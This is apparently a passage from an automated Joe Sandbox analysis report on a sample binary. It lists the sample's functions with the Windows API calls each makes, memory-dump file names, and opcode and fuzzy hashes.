Instruction Fuzzy Hash: 2E01DD321083016FD3219B7ADC88AABBBF8AF51760B04803EF446D3291D7748C40C66D

Function 00408EB4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 00408EED
GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
GetWindowTextLengthW.USER32 ref: 00408F0A
HeapAlloc.KERNEL32(00000000), ref: 00408F1F
GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
DestroyWindow.USER32(?), ref: 00408F3D
UnregisterClassW.USER32 ref: 00408F53

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
String ID:
API String ID: 2895088630-0
Opcode ID: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
Instruction ID: 1940c3daec6268f5e5453f2abd6c11195bb238337c9a47dace4bef07d760dbb1
Opcode Fuzzy Hash: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
Instruction Fuzzy Hash: 9011FA3110821AFFCB115F64ED4C9E63F76EB18365B10C17AF845A2AB0CF359951EB58

Function 00409588 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(00409507,?), ref: 0040959B
GetCurrentThreadId.KERNEL32 ref: 004095B3
SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
GetCurrentThreadId.KERNEL32 ref: 004095EF
EnableWindow.USER32(?,00000001), ref: 00409605
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
Instruction ID: 1b506e7c949c81e82e84a7d7bfb29e48a0d3001387cd43cbe5fa1ceb5ac7c4b4
Opcode Fuzzy Hash: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
Instruction Fuzzy Hash: D211D032149741BBD7324F16EC48F57BBB9EB81B20F148A3EF065226E1DB766C44CA18

Function 0040D9D3 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9F8
HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA0C
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA19
TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA30
HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA3F
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA4E

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocValue$Heap
String ID:
API String ID: 2472784365-0
Opcode ID: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
Instruction ID: 2e0cfeba47cec0f6b91efb2e93d625c98a83c07df354da5318bce0fb1280086a
Opcode Fuzzy Hash: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
Instruction Fuzzy Hash: 1C118676A45310AFD7109FA5EC44AA67FA9EB18760B05813EF904D7370DA359C44CBAC

Function 004126A4 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

UnregisterWait.KERNEL32(?), ref: 004126AE
CloseHandle.KERNEL32(?,?,?,?,0041282A,?), ref: 004126B7
EnterCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126C3
LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126E8
HeapFree.KERNEL32(00000000,00000000,?,?,?,0041282A,?), ref: 00412706
HeapFree.KERNEL32(?,?,?,?,?,0041282A,?), ref: 00412718

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
String ID:
API String ID: 4204870694-0
Opcode ID: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
Instruction ID: 8ad69fc92b526a08bfe7472bb61da84b570d2b31100e81d3d28f3db860eb322d
Opcode Fuzzy Hash: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
Instruction Fuzzy Hash: ED014874202605BFC7159F11ED88ADABB79FF49352310843EE51AC6A60CB35A861CBA8

Function 004057F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 00405853
memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
wcsncpy.MSVCRT ref: 004058F9

Strings

$0A, xrefs: 0040580C
$0A, xrefs: 00405819

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: memmovewcsncmpwcsncpy
String ID: $0A$$0A
API String ID: 1452150355-167650565
Opcode ID: 14318413d9adc2e2b942005046f5369366b6e76739e1c09bf8bc34821c1b3a51
Instruction ID: 832c062924e7bef47b33d77ba9c88e4f4304e1b7f9fac3bbf8cf3561daacd64f
Opcode Fuzzy Hash: 14318413d9adc2e2b942005046f5369366b6e76739e1c09bf8bc34821c1b3a51
Instruction Fuzzy Hash: 7131C336904B058BC720BA55888057B77A8EE84384F14893EEC8537382EB799D61CBA9

Function 0040552C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040553B
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A

Strings

RtlGetVersion, xrefs: 00405554
ntdll.dll, xrefs: 00405545

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: RtlGetVersion$ntdll.dll
API String ID: 3137504439-1489217083
Opcode ID: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
Instruction ID: c27d50cfc24873b946f5b5a14a9105dc5d991450749eb0f504377b4d26b5710e
Opcode Fuzzy Hash: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
Instruction Fuzzy Hash: 14E0DF31B8461576C6202F75AC0AFCB2AEDCFC6B41B18043AF101F31D5DA38CA418ABD

Function 0040A6C3 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040A72B
HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?,00403C0E), ref: 0040A741
wcscpy.MSVCRT ref: 0040A74C
memset.MSVCRT ref: 0040A77A

Strings

$0A, xrefs: 0040A6FC

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocHeapmemsetwcscpywcslen
String ID: $0A
API String ID: 1807340688-513306843
Opcode ID: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
Instruction ID: e32262bd00c92b68ef8260e1fb7dc13a688965226c4dfc8bf1af71259570edab
Opcode Fuzzy Hash: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
Instruction Fuzzy Hash: 3C214872100B01AFC321AF159881B6BB7F9EF88314F14893FF58563691CB79E8258B1A

Function 0040A460 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0

HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A51C

Strings

$0A, xrefs: 0040A507

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Heap$Free$Alloc
String ID: $0A
API String ID: 3901518246-513306843
Opcode ID: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
Instruction ID: cd652e3bdf182b70a5213d1d771de0a97fad45979f4c99c471b58853275527fc
Opcode Fuzzy Hash: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
Instruction Fuzzy Hash: F4216AB1600716BFD3108F2ADC01B46BBE4FB4C700F41812EB508E76A1DB70E964CB99

Function 0040548C Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00001000,?,?,00000000,00989768), ref: 004054A5
EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA

Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB

LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
String ID:
API String ID: 3708593966-0
Opcode ID: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
Instruction ID: 22802cd27a3f1ed093d1fd342325ad429a5e5b172653039cc62d2cb3277a330b
Opcode Fuzzy Hash: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
Instruction Fuzzy Hash: AD11C232148214BFC3115F69EC05AD7BBB9EF46752720843AF800972A0EB75A8818B68

Function 0040DFC6 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F

Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028

DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040E048
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040E057

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
Instruction ID: 55e4d48cd168304893741703cb98186ecc41a8d0b28d64f5ed6d9708d3a92668
Opcode Fuzzy Hash: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
Instruction Fuzzy Hash: 23116A71101611EFC720AF16DC08B97BBB9FF45301F15883EE50AA7AA1C779A855CFA8

Function 0040994F Relevance: 7.5, APIs: 6, Instructions: 31COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00989768,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040995D
CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409968
CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409973
CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040997E
EnterCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409986
LeaveCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040999A

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CloseHandle$CriticalSection$EnterLeave
String ID:
API String ID: 10009202-0
Opcode ID: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
Instruction ID: e0bc3ded0607a690d6707024abf9d108a6c512657707c309f6689cc3689588ed
Opcode Fuzzy Hash: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
Instruction Fuzzy Hash: 35F0FE32004600ABD3226F25DC08BABB7B5BF91355F15883EE055615B0CB796896DF59

Function 00409698 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
Part of subcall function 0040E900: HeapReAlloc.KERNEL32(00980000,00000000,?,?), ref: 0040E967

GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
wcscmp.MSVCRT ref: 004096C2
memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA

Strings

\\?\, xrefs: 004096BA, 004096D4

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocFileHeapModuleNameValuememmovewcscmp
String ID: \\?\
API String ID: 3734239354-4282027825
Opcode ID: 33c17352ecf2d33e8b842fb82144003de2b1de4302be4aa3bf9866a4b196b950
Instruction ID: 45f2cbb32eb965b059acfe96771e330f3b1ba6a562bb2c4a442859e911d7a588
Opcode Fuzzy Hash: 33c17352ecf2d33e8b842fb82144003de2b1de4302be4aa3bf9866a4b196b950
Instruction Fuzzy Hash: 15F0E2B31002017AC2006777DC89CAB7BACEB853B4750093FF516E2491EA38D82486B8

Function 0040B8B6 Relevance: 6.3, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B957
memset.MSVCRT ref: 0040B960
memset.MSVCRT ref: 0040B969
memset.MSVCRT ref: 0040B976
memset.MSVCRT ref: 0040B982

Part of subcall function 0040CCB6: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B8F5,?), ref: 0040CD10
Part of subcall function 0040CCB6: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B8F5,?), ref: 0040CD5F

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
Instruction ID: 1965f6ec6392bd57460d2593cd94e0dced67690f07481f5a959be489f1b8959c
Opcode Fuzzy Hash: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
Instruction Fuzzy Hash: FD21D6727507083BE524AA29DC86F9F738CDB41708F50063EF241B62C1DA79E54546AD

Function 00405BA0 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,?), ref: 00405C6A
wcsncpy.MSVCRT ref: 00405CC0

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocHeapwcsncpy
String ID:
API String ID: 2304708654-0
Opcode ID: a90f3be50ee59ad9f9cb2c8344752c2d6c44559da06bb1932963a8c5f4cf1607
Instruction ID: c5f2f283d94cb2b95ca38a154dbf8d05cc6d7144c7ec2ede7a16228095844b4d
Opcode Fuzzy Hash: a90f3be50ee59ad9f9cb2c8344752c2d6c44559da06bb1932963a8c5f4cf1607
Instruction Fuzzy Hash: F751BD34508B059BDB209F28D844A6B77F4FF84348F544A2EFC85A72D0E778E955CB89

Function 00406670 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406696
CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066D0
CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066FF
CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406705

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
Instruction ID: f3574eb3d9009b883351c62f390b1b458f0f5c76b551c27569f8cb84250b8306
Opcode Fuzzy Hash: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
Instruction Fuzzy Hash: 0E2157796043158BC710EF5D9C40077B3A0EF80765F86887BFC85A3380DA39EE169BA9

Function 00412840 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D738,00000000), ref: 00412874
malloc.MSVCRT ref: 00412884
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 004128A1
malloc.MSVCRT ref: 004128B6

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
Instruction ID: e0c8a2120d9564889d2f3113141632f921e3b611a2b6a27c47ae7c2ad602c93a
Opcode Fuzzy Hash: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
